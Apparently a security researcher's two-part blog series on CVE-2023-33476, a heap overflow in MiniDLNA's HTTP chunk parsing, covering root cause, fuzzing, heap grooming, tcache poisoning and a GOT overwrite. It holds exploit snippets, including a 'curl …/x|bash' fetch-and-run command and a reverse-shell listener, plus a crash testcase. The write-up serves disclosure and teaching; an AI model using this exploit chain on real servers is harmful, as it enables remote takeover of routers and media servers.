hyprblog

chonked pt.2: exploiting cve-2023-33476 for remote code execution

2023-06-19T00:00:00+00:00

This is the second part of the two-part series covering a heap overflow I found in ReadyMedia MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going over the various challenges that had to be overcome and how everything was put together to achieve remote code execution and pop a reverse shell using a tcache poisoning attack. Check out the first post for an in-depth root cause analysis and overview of the vulnerability.

Introduction

This is the second part of the two-part series covering a heap overflow I found in ReadyMedia MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going over the various challenges that had to be overcome and how everything was put together to achieve remote code execution and pop a shell. Check out part 1 for the root cause analysis of this bug.

Before diving into the details of the vulnerability and the exploit, its worth taking a moment to go over the basics of how chunked requests work and fundamentals of the bug.

Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve tried to include as much as possible to help it all make sense and help others who are trying to learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any corrections needed.

If you just care about the code, you can find it here.

review of http chunked encoding

An HTTP request will set the Transfer-Encoding HTTP header to chunked to indicate to the server that the body of the request should be processed in chunks. The chunks follow a common encoding scheme: a header containing the size of the chunk (in hex) followed by the actual chunk data. As this is HTTP, the character sequence \r\n serves as delimiter bytes between chunk size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.

A typical request using chunked encoding will look something like this:

POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

The request above contains two chunks: one 4-byte chunk and one 16 byte chunk (chunk sizes are parsed as hex), followed by the zero-length terminator chunk. The server will parse the chunk sizes and use this to construct a single blob of data composed of the concatenated chunk data, minus the size metadata.

summary of the bug and initial primitive

Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code that triggers the memory corruption as a result of the bug is shown below.

    char *chunkstart, *chunk, *endptr, *endbuf;

    // `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunk size parsed by strol() above
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }

To recap the important details:

strtol() is used to parse the HTTP chunk size from the body of the request (which we fully control). The value returned by strtol() is saved to h->req_chunklen
h->req_chunklen is used as the size argument in a call to memmove() without bounds-checking
The dest and src arguments passed to memmove() are both offsets into the request buffer; in theory, they should point to the first digit of the chunk size and the first byte of the actual chunk data that follows the chunk size, respectively.
the request buffer containing our data is allocated on the heap

Due to the missing bounds-check in the code above (and the broken validation logic that is the root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this point, I still had almost no control over what gets written and where its written to. Since the corruption occurs on data allocated on the heap, this introduced the option to either attack the application data directly or target the heap metadata to derive more powerful primitives.

Understanding the Corruption Mechanism

NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.

effects of `memmove()`

We’ll start with the detail that had the most impact on developing the exploit: the use of memmove() to concatenate the end of one HTTP chunk to the next. Each iteration through the while loop in the code snippet above is meant to process a single HTTP chunk from the body of the request; assuming multiple chunks are present (which is always the case for valid requests) the code needs to concatenate the beginning of the chunk it is processing to the tail end of the chunks that have already been processed and remove the chunk size metadata between them. The application does this in-line within the same buffer instead of creating a new allocation to hold the final blob of data; it selects the range of bytes pertaining to the current chunk being processed based on the chunk size it finds in the request and will then ‘left-shift’ those bytes x bytes lower in memory, where x is the total length of the chunk size field (i.e. strlen(chunk_size_line)).

In practical terms, this introduces the following conditions and constraints:

As we can only control the size and not the location of the r/w, we are only be able to r/w higher into memory relative to location of the chunk in the buffer allocated for the request
The number of bytes the data will be left-shifted by is determined by the distance between the dest and src args passed to memmove() (endbuf and endptr respectively in the snippet of the vulnerable code above)

visualizing the operation

This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at least not to me) so it may be useful to try to visualize it. I created the graphic below using Google Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.

The before and after rows below represent a contiguous chunk of memory containing the contents of an HTTP request before and after the memmove() operation using the chunk size at the beginning of the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling” on the left side of the ribbon starting at read_src , we can shift the bytes to the left toward us (we’re fixed at write_dest). There isn’t a limit to how much data to the right of read_src we can shift left, but we can only shift by (read_src - write_dest) slots. The grid slots (i.e. addresses) are fixed, so if we want some payload to end up at a specific target address we need to be able to shift the bytes of that payload left by at least (target_addr - payload_addr).

To break it down:

The cells with the red border show the bytes that would be selected by a chunk size of 23 (as seen at the beginning of the row)
The location where memmove() will write the bytes to is highlighted in green (endbuf ptr passed as first arg)
The location where memmove() will start reading from is highlighted in purple (endptr ptr passed as the second arg)

Extrapolating from the examples above, we can see that changing the chunk size alone will have virtually 0 impact on where the data is written relative to our target — larger sizes will reach further into memory but will result in those bytes being shifted by the same distance, which means for a given target at address x and payload data at x+20, selecting bytes up to x+20 or x+100 will result in the same bytes being written to x after the call to memmove().

controlling the shift distance

As mentioned in the previous section, the distance the selected byte-range is shifted by is determined by the number of bytes between the pointer where the bytes will be written (endbuf) and the pointer where data will be read from (endptr). Based on the parsing logic, this ends up being the number of bytes between the first byte of the chunk size in the request body and the location where the first byte of actual chunk data is expected to be. In the code, this is done by passing a pointer &endptr as the second arg to strtol() when parsing the chunk size value from the request to have strtol() store the location of the first non-parsable value it encounters to this pointer. In a normal request, this would be the \r that comes immediately after the chunk size. The code checks for the presence of \r\n starting at the value saved to this pointer to confirm this sequence is in fact present and if found increments it by 2 to move it past those characters. The pointer would then presumably point to the start of the actual chunk data.

The relevant code is shown again here:

  while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
  {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        { ... }
        endptr += 2;

        memmove(endbuf, endptr, h->req_chunklen);
...

This means that in order to gain control over that distance, its necessary to introduce additional bytes between the two pointers without causing strtol() to stop parsing prematurely. Taking a look at the manpage for strtol(), the following line caught my attention:

The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]

By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary number of bytes in order to affect the distance between endbuf and endptr when memmove() is called. Alternatively, prepending 0's to the chunk size achieves the same result.

example

This example shows a request where no leading whitespace has been added. At the first round of processing:

endbuf is at index/address 489
endptr is at index/address 493
Chunk size is 23, so 23 bytes will be shifted
(489 - 493 = -4), so each byte in the range of bytes to be shifted will shift -4 bytes down.
We want to overwrite 4 bytes starting at index 501 (cells highlighted in red)
The payload data we want to use for the overwrite starts at index 512 (cells highlighted in yellow)
Distance between overwrite target and overwrite data source is -11 bytes
The corruption does NOT successfully shift our overwrite data to the desired location

With the introduction of whitespaces prepended to the chunk size at the start of the request body:

endbuf is now at index 482
endptr is still at index 493
(482 - 493 = -11), so each byte in the range of bytes to be shifted will shift -11 bytes down.
We want to overwrite 4 bytes starting at index 501
The data we want to use for the overwrite starts at index 512
Distance between overwrite target and overwrite data source is still -11 bytes

Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk size to make endbuf - endptr == overwrite_target - payload_data

heap-based corruption

The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of neighboring heap chunks. Based on the conditions described so far, it’s actually impossible to avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal request containing no data in the chunk fields (such as the request provided as an example at the beginning of this post) the memmove() operation is going to be performed on data near the end of the allocated buffer, overflowing into the next chunk almost immediately. While this introduces additional attack surface and exploitation options, it also adds some limitations, namely the need to bypass Glibc security and sanity checks so as to avoid abort()ing before the exploit finishes or triggering some other crash.

Heap Feng Shui

NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.

Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving some level of control over the layout of the heap in order to get target objects and payload data allocated at predictable locations. Based on conditions described above, this would be absolutely necessary for a successful exploit in this case. Specifically, it would be necessary in order to meet these requirements:

The target address for the overwrite target must be located higher in memory relative to where the request buffer used to trigger the corruption is located
The payload data used to overwrite the target address must be located higher in memory relative to the target address

Based on these requirements, the ideal memory layout would look something like this:

0x2000
---
	.....................
	...request_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

For this theoretical layout, we would then provide a chunk size large enough to traverse the overwrite_target and reach the last byte of the payload_data.

In practice, to achieve the layout above its necessary to:

Have controlled data allocated to the heap
Prevent the allocations from being free()’ed prematurely
Force allocations to happen sequentially or in a way that can be reliably predicted

controlling allocations

Unsurprisingly, the most straightforward way to force the application to make heap allocations with controlled data is by sending HTTP requests, so this can be used as an interface/proxy for malloc(). One important detail about this is that the request buffer allocations are done using realloc() rather than malloc() — requests that exceed 2048 bytes will result in the existing allocation being reallocated, which can affect the heap layout and result in heap chunks being freed unintentionally. We can avoid this issue entirely by keeping all requests below this size.

holding request allocations

The next requirement is almost more important than the first — the allocations containing our controlled data must remain allocated across multiple requests in order to successfully get the desired memory layout. This took a little bit of fiddling around but I eventually found an easy way to do this.

The code that handles the initial reading of the request data from the socket is shown below. After copying the data from the static buffer to the dynamically allocated buffer at h->req_buf, it searches for the presence of the sequence \r\n\r\n using strstr() to determine whether the entire contents of the HTTP headers have been received (the first occurrence of that sequence is expected to be the terminator for the headers).

        memcpy(h->req_buf + h->req_buflen, buf, n);
        // update req_buflen
        h->req_buflen += n;
        h->req_buf[h->req_buflen] = '\0';

        /* search for the string "\r\n\r\n" */
        // this is the mechanism used to determine where the end of the http
        // headers are since that should be the first occurance of this string sequence
        // for a normal http request.
        endheaders = strstr(h->req_buf, "\r\n\r\n");

        if(endheaders)
        {
          h->req_contentoff = endheaders - h->req_buf + 4;
          h->req_contentlen = h->req_buflen - h->req_contentoff;
          ProcessHttpQuery_upnphttp(h);
        }

If this sequence is not found, the application will move on without entering the block where ProcessHttpQuery_upnphttp() is called above and wait for the client to send more data to complete the headers. This leaves the buffer at h->req_buf containing up to the first 2048 bytes of data sent allocated indefinitely until more data arrives on the socket or the connection is dropped by the client. By introducing a NULL byte anywhere before the first \r\n\r\n terminator in the request data sent it’s possible to force strstr() to terminate early and not find those characters. Alternatively, not including the terminator sequence at all will also result in the application assuming the client has not yet sent all headers and holding the the allocation. We can then free() any allocation made this way by closing the socket used to initiate it.

getting sequential allocations

With the two previous steps figured out, it was then possible to start influencing the heap layout with sufficient control to start working on getting the allocations made in a predictable way in order to eventually set things up in an ideal way for the exploit. The first step was to identify where heap allocations happen along the execution path for request processing, their sizes, and whether they contained any data that may be interesting to target. After a bit of code review we can determined that, apart from the request buffer allocation (saved to h->req_buf), the only other relevant allocation that happens for each request is for a upnphttp structure, which stores the state, data, and metadata for the request being processed (saved to h). The pointer to the request buffer itself is stored inside the upnphttp structure.

I created the following GDB script to log every time either a request allocation or upnphttp struct allocation occurred and the addresses for the allocations.

set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h->req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d

I wrote a Python script using raw sockets to start performing allocations for both the upnphttp structures and the request buffers and observing the addresses where the allocations occurred, using the method described in the previous section to keep the allocations held in memory across multiple requests. This took a bit of fiddling and playing with the order that connections were initiated in and when request buffers were allocated but I eventually found that after about 6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers began getting allocated sequentially in memory.

separating the connection and request buffer allocations

Because the fields of the upnphttp structure are accessed throughout the code that handles request processing, it would be ideal to separate those allocations from the request buffer allocations so that the latter end up allocated sequentially, rather than having the upnphttp structures sandwiched between them. This can be accomplished by initiating the connections that will be needed before sending any data on the sockets — the upnphttp structures are allocated when the connection is received (in New_upnphttp(), called by ProcessListen() upon receiving a new connection) and will remain allocated as long as the connection is kept open, which allows us to send data asynchronously from when the connections are initiated.

the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap

Taking another look at the ideal heap layout described above, here is what needs to be done to construct it using the techniques and information described so far:

Allocate the connection upnphttp structs that will be needed before sending any request data
Send request data on x of the allocated connections to reach the point where request buffer allocations start happening sequentially. The real ‘crafted heap’ starts here.
Send the request data for the request that will trigger the corruption (’top’ of the crafted heap, at lower address)
Send request data to create another request buffer allocation of the same size as the previous one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.
Send the request containing the payload data that will be written to the target (’bottom’ of the crafter heap, at higher address)

0x2000
---
	.....................
	...corrupt_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

As can be seen, the request that is used to trigger the corruption must be sent before allocating the other buffers to have it allocated at a lower address relative to the others. This is a bit of an issue because sending the actual corruption payload first would either trigger a crash prematurely at worst (preventing anything else from being done) or get processed and result in the buffer being free()‘d at best. After spending some time learning about the Glibc malloc implementation and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation in the place where the corruption buffer would need to be; that allocation then gets free()‘d immediately before sending the actual corruption request, after the crafted heap has been set up. By making this placeholder allocation the same size as the corruption request allocation (rounded up to the actual malloc chunk size), making an allocation of that size immediately after it’s free()‘d results in the same chunk being returned by malloc() due to its “first fit” design. This means that sending the actual corruption request after dropping the connection for the placeholder buffer (causing it to be free()‘d) will result in the data for the corruption payload being allocated where we need it.

putting it all together

Having figured out everything covered in the previous sections, we now have everything we need to write an exploit. Before going into the meaty details, lets take a moment to review. We can now:

Control when allocations (i.e. malloc calls) are made and control their size
Control when allocations are free()‘d so we can keep buffers in place while we make other allocations
Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory
Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation

Exploit: Arbitrary R/W via Tcache Poisoning for RCE

Whew! That was a lot of background to cover but hopefully that will all help with making sense of the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll avoid going into specifics like sizes and addresses since those are variable and not critical for understanding how the exploit works. The source code for the exploits has been heavily commented if you’re interested in more details.

The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the Global Offset Table (GOT) and overwrite the entries for free() and fprintf() to point to system(). free() is targeted as it will be called for h->req_buf at the end of request handling, transforming the call from free(h->req_buf) to system(h->req_buf). The payload sent for the final allocation where the GOT is corrupted begins with a shell command that will download and execute a script from an attacker-controlled server and spawn a reverse shell.

setup: building the target

The exploit is written for a binary with only partial RELRO and no PIE; the address of system() in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM using Glibc 2.31 (default version installed by OS).

# install deps
sudo apt install -y autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev \
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
cd minidlna-git && git checkout tags/v1_3_2
./autogen.sh
./configure --enable-tivo CC=clang CFLAGS="-g -O0 -fstack-protector"
make minidlnad CC=clang CFLAGS="-g -O0 -fstack-protector"

This is the output of the checksec tool for the output binary:

-> % checksec ./minidlnad
[*] '/home/hyper/minidlna-1.3.2/minidlnad'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The server can be started using the following command:

sudo ./minidlnad -R -f minidlna.conf -d

tcache poisoning tl;dr

I’ll assume you have some background on heap exploit techniques so won’t go super in-depth here but if not I highly recommend the how2heap series on Github. It covers basically every known technique and has up-to-date examples for the latest Glibc versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional constraints and checks that will need to be bypassed.

At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free chunks in both directions, it only keeps a singly-linked list using the fd fields of the free()‘d chunks to keep track of them. By corrupting the fd pointer of a free’d chunk in a tcache bin for a given size, a subsequent call to malloc() for that size will result in the allocator returning the chunk pointed to by fd.

constructing the fake chunk for poisoning

Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s already been free’d and this chunk needs to be located after the request buffer containing the payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so we control its contents and can place the payload data we want written to the target location (the fd pointer) within it. One important thing to note is that because we free the chunk before corrupting it, the first 16 bytes of the data we send will be overwritten by free() to store the fd and bk pointers (though technically only the fd pointer is actually used by tcache), so the payload data sent is placed at +16-byte offset into the buffer to avoid it being corrupted before we copy it over the target location.

The illustration below shows how this chunk would look before and after being free’d, with return_addr at the right offset to ensure its left intact.

heap preparation

The first step taken is to use the techniques described earlier in the post to set the heap up so that we can get allocations created sequentially and spray the fake chunks described in the previous section into those allocations to use them later.

    # * the socks at the end of this list should all be right next to each other
    # * we'll free these LIFO from the tail to ensure our next allocs for the corruption 
    #   will come from that sequential chunks. we need at least 2-3 sequential chunks so we use
    #   a total of 10 allocations here

    # create and connect needed sockets before sending any data on any of them. This should
    # keep the allocations for the upnphttp structs separate from the request buffer allocations.
    GROOMING_ALLOCS = 10
    xpr(f"starting heap grooming round, using {GROOMING_ALLOCS} allocs...")
    dummies = create_sockets(GROOMING_ALLOCS)
    connect_sockets(dummies, server_ip, server_port)

    # This is the target address we want malloc to return after the chunk has been corrupted
    where = pwn.pack(target_addr, 64)

    # create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
    # (fd, bk)
    pre_pad = b"\x11" * 16 # \x11 is arbitrary
    core = pre_pad + where

    # pad the end of the paylaod with enough bytes to meet the size needed for the target tcache bin
    # allocations need to be kept the same size because tcache bins must match exact sizes
    payload = pad(ALLOC_SIZE, core)

    # send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
    # the last 3-4 will be allocated sequentially.
    sendsocks(dummies, payload)

    # free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
    # so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
    # both the upnphttp structs and the request buffers they contain.
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()

After this code runs and the last few allocations are dropped, those free’d chunks should look something like this in memory and should be in the tcache bin for the matching size (0x60):

poisoning the free’d chunk

Immediately after setting up the heap, the exploit then initiates a connection for the request that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to trigger the corruption is padded to match the size of the chunks we just free’d in the previous step so when the allocation is made, malloc() will return the last chunk that was inserted into the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted into the corresponding tcache bin will be the top chunk shown in the illustration above (at the lower addresses), so that’s the chunk we’ll get back.

Assuming everything is set up correctly, the chunk for the corruption request and the target chunk will then look like this (the buffer containing the corruption payload highlighted in green). As can be seen, things are now set up in such a way that we should be able to use the OOB read to read past the end of the buffer containing the corruption payload and into the free’d chunk immediately after it. The free’d chunks still contain the return address payload we want to have written over the fd pointer of the same chunk, so we should be able to reach return_addr with the call to memmove() since we have full control over the len argument.

The write portion of the memmove() will then “slide” the selected region of bytes “up” (based on the illustration above) so that return_addr ends up overwriting fd 40 bytes below it. To accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the desired location as described in the “controlling the shift distance” section earlier in the post. Once this request has been processed, it will get free’d and inserted back into the same tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this (note that the size, prev_size, etc values shown at the end of the corruption buf are from the chunk below it, showing where those values end up after the call to memmove()):

In order to get the tainted chunk returned to us (the middle one in the illustration), we’ll need to make at least 1 allocation of that same size before that and then the next allocation of that size will have malloc() return the pointer we wrote to fd back to us. In the case of the exploit, this will be the address of the Global Offset Table (GOT).

corrupting the GOT

After successfully tricking malloc() into returning a pointer to the GOT, the next step is to corrupt one (or more) of the entries contained within to achieve code execution. The most straightforward way to do this is to call system() and pass it a pointer to some data we control containing a string with the command we want to execute. Since we have full control over the content that’s written, the question is then to figure out which function(s) to corrupt. Because system() expects a single argument that’s a pointer to some string data, the function(s) we target must also take a char (or void) pointer for its first argument and that pointer has to point to data we control. Finally, the target function(s) need to be called at some point after we’ve corrupted the GOT but before any other GOT entries that we’ve corrupted are referenced, since this will almost certainly result in a crash.

Taking all of this into consideration, I eventually found the two functions that would be targeted: fprintf() and free(). The actual entry that produces the code execution is free() but because the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial writes into the request buffer, successfully corrupting free() also results in corrupting other GOT entries, including the one for fprintf(), so it needs to point to a valid function since it’s called at least once before the next call to free(). Corrupting free() is a logical option since it meets all of the requirements without any additional setup: it takes a single pointer argument and will be called and passed the pointer to our request buffer almost immediately after we corrupt the GOT, reducing the risk of other functions that have been corrupted being called and crashing the application prematurely. As a bonus, hijacking free() also helps us avoid triggering the sanity checks in Glibc that would trigger an abort() after we’ve corrupted the heap metadata.

Because free() (i.e. system() after the GOT is corrupted) will be called on the pointer to the GOT where we’re writing the fake entries to, we can insert the command string we want passed to system() right at the start of the buffer to have it executed. The code below shows the construction of the final payload containing the command to run and the fake GOT entries with the padding needed for the binary the exploit was written for (free() at GOT+0x40, fprintf() at GOT+0x50):

    # set up the command string that will be passed to system()
    staging_server_addr = f"{args.lhost}:{args.lport}"
    # command: e.g. `curl 192.168.1.8:8080/x|bash`
    command_str = f"curl {staging_server_addr}/x|bash".encode()
    command_padding = b""

    # final cmd string max len is 64, if less than, pad it out
    OFFSET_TO_FREE = 64
    if len(command_str) < OFFSET_TO_FREE:
        command_padding = b"\x00" * (OFFSET_TO_FREE - len(command_str))
    if len(command_str) > OFFSET_TO_FREE:
        xpr("command string too long using provided args, offsets will fail. bailing...")
        sys.exit(1)
    command = command_str + command_padding

    # set up fake GOT table for the overwrite (note: this will need to updated for binaries that have different offsets between the two)
    got_table = b""
    got_table += pwn.p64(args.system_addr) # free() entry
    got_table += pwn.p64(0x0) # pad
    got_table += pwn.p64(args.system_addr) # fprintf() entry

    final_payload = command + got_table

After the final payload above has been sent and the GOT has been corrupted, the next call to free() will actually be a call to system() and it will be passed the pointer where we just wrote the payload.

reverse shell stager and listener

The command string passed to system() will download a script from an attacker-controlled server using curl and pipe the contents of the script to bash. The exploit sets up an HTTP listener to handle the incoming request and responds with a small script to initiate a reverse shell back to the attacker-controlled server. After responding to that request, it creates the listener for the reverse shell and waits for the connection.

    # handle the http request to serve script to spawn reverse shell
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        l.sendline(resp.encode() + reverse_shell_cmd.encode())
        l.close()
    else:
        xerr("=ERROR=: Timed out waiting for staging connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target")
        sys.exit(1)

    # wait for the incoming reverse shell connection; bail if we don't get it in a second.
    l = pwn.listen(args.lport)
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        xpr("~~~  ~~~")
        l.interactive()
    else:
        xerr("=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target")
        sys.exit(1)

popping a shell

And here’s the exploit running against the target binary:

Wrapping Up

And there we are! Hopefully this has all been useful for understanding everything that goes into writing a full exploit for this kind of vulnerability. Ultimately, it isn’t complete in the sense that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe that can be left as an exercise for the curious reader.

exploitability in the Real World(TM)

Exploitability of this bug will be dependent upon the Libc version the application is linked against and compiler exploit mitigations used, to some extent. Given the variability of these factors across the range of devices this application is deployed to (IoT, routers, linux servers), there is a high likelihood of finding Libc versions vulnerable to multiple heap exploit techniques and missing exploit mitigations such as ASLR, RELRO, etc. Ultimately, because the bug provides for a strong write primitive, there are various options for exploitation. While most modern Linux distros running on desktop/server hardware now enable common compiler exploit mitigations for default applications and applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices where those mitigations are likely to not be enabled; versions built from source by end-users are also unlikely to enable these mitigations. The exploit strategy and mechanisms used in the included exploits will not work universally across all platforms and configurations, but there are likely dozens of targets that would meet the necessary criteria.

arm32 exploit?

This post is already pretty long and it’s taken me longer than expected to release it, so I’ve decided the split the last section going over the exploit I wrote for the arm32 minidlnad binary from the Netgear RAX30 into a separate post, though the exploit code for both will be made available now. That exploit works a little differently, targeting the stack rather than the GOT for overwrite since that binary has full RELRO enabled (which makes the GOT read-only).

Resources

chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis

2023-05-31T00:00:00+00:00

This post provides the details and a root cause analysis of a heap buffer overflow vulnerability I discovered in the HTTP chunk parsing code of MiniDLNA, affecting versions up to 1.3.2. This vulnerability can be exploited to achieve remote code execution in the context of the user that the minidlna server is running as. The issue was reported to the package maintainer following best practices for responsible disclosure and a fixed version is now available. A follow up post will be published soon with a detailed write-up of the exploit development process along with two fully weaponized exploits for both x86_64 and ARM32 targets, so stay tuned :)

Update: The second part of this post has been published and can be found here

Introduction

Update 2023-06-02: The vulnerability has been assigned CVE-2023-33476.

This post will go over the details and root cause of a heap buffer overflow vulnerability I discovered in the HTTP chunk parsing code of MiniDLNA, affecting up to version 1.3.2. This vulnerability can be exploited to achieve remote code execution in the context of the user that the minidlna server is running as.

The second part of this post contains a detailed write-up of the exploit development process along with two fully weaponized exploits for both x86_64 and ARM32 targets and can be found here.

Vulnerability Summary

MiniDLNA is a simple media server software, with the aim of being fully compliant with DLNA/UPnP-AV clients. It is commonly deployed on Linux servers and across a wide range of embedded devices like routers and NAS devices.

The latest version of the MiniDLNA/ReadyMedia media server contains a vulnerability in the HTTP request processing code responsible for handling requests that use chunked encoding which can result in an out-of-bounds read/write leading to remote code execution. The issue occurs in the validation logic for chunk sizes in ParseHttpHeaders() and results in the return value of a comparison expression being incorrectly saved to a variable used to track the parsed chunk size rather than the return value of strtol() that’s used to parse the size. This allows for values larger than the total request size to pass validation; the application later parses and passes these chunk size values as the size argument in call(s) to memmove(), resuling in an OOB read/write on the heap.

Affected Versions

All versions between 1.1.5 and 1.3.2 (inclusive)
Default versions provided by apt on Debian 11 and Ubuntu 22.04
Version deployed on the Netgear Nighthawk RAX30 w/ latest patches

Minimal Testcase to Trigger the Bug

This testcase will trigger the bug by passing a huge value (0xffffff) that is much larger than the total request length sent, resulting in an OOB read past the end of the request buffer allocation and into unmapped memory. The application should crash with a segmentation fault.

GET /status HTTP/1.0\r\nTransfer-Encoding:chunked\r\n\r\nffffff\r\n0\r\n\r\n

Discovery

I originally discovered this vulnerability while fuzzing an older version of the software while hunting for bugs on the Netgear RAX45. I wasn’t familiar enough with the code base to know exactly the right place to fuzz so I just chose to go for the most reachable part of the code: HTTP request handling. Fuzzing was done using both LibFuzzer and AFL++ using custom harnesses. I made some minor changes to the code to improve fuzzability, including removal of the network read/write functionality, but otherwise no other changes were needed.

The core portion of the harness used to find this particular bug is shown below. The full harness code and other helper code will be released soon.

#include 
#include 
#include 
#include "minixml.h"
#include "upnphttp.h"
#include "upnpsoap.h"
#include "containers.h"
#include "upnpreplyparse.h"
#include "scanner.h"
#include "log.h"

void ProcessHttpQuery_upnphttp(struct upnphttp *);

int LLVMFuzzerTestOneInput(char *buf, size_t size)
{
    struct upnphttp *h = New_upnphttp(1);
    const char *endheaders;
    h->req_buf = (char *)malloc(size+1);
    if (!h->req_buf)
    {
      return 0;
    }
    memcpy(h->req_buf, buf, size);
    h->req_buflen = size;
    h->req_buf[h->req_buflen] = '\0';
    /* search for the string "\r\n\r\n" */
    endheaders = strstr(h->req_buf, "\r\n\r\n");
    if(endheaders)
    {
      h->req_contentoff = endheaders - h->req_buf + 4;
      h->req_contentlen = h->req_buflen - h->req_contentoff;
      ProcessHttpQuery_upnphttp(h);
      free(h->req_buf);
      free(h->res_buf);
      free(h);
      return 0;
    }
    free(h->req_buf);
    free(h->res_buf);
    free(h);
    return -1;
}

After a few days of fuzzing, tweaking the harnesses, and fuzzing some more, I had come across a handful of crashes that seemed somewhat promising. Among them was this one.

An interesting side note here: thanks to Netgear’s terrible practices with their GPL code releases, it turned out that the actual device I was testing against (RAX45) was not only running a newer version than the one they included in their GPL package, it was also a custom fork that apparently had fixed these bugs already. I confirmed this by reversing the binary taken straight from the device. Maybe its just me, but its nuts that they’re fixing vulnerabilities in their internal forks of open source code and not providing those fixes in their GPL packages, let alone pushing them upstream. After discovering this I decided to pivot to just focusing on the latest code from MiniDLNA Git repo and confirmed that version was vulnerable as well.

Root Cause Analysis

The vulnerable code is reached for any valid request that includes the Transfer-Encoding:chunked HTTP header and that meets the following conditions:

Correctly terminates the HTTP headers with \r\n\r\n sequence
Includes a terminator chunk at the end of the request body with a chunk size of 0
Correctly follows chunk size values with terminator sequence \r\n

The function call chain is shown below, beginning in Process_upnphttp() (upnphttp.c:1096):

Process_upnphttp() →
    ProcessHttpQuery_upnphttp(h) →
        ParseHttpHeaders(h) ← (returns)
    ProcessHttpQuery_upnphttp(h) -- VULNERABLE CODE

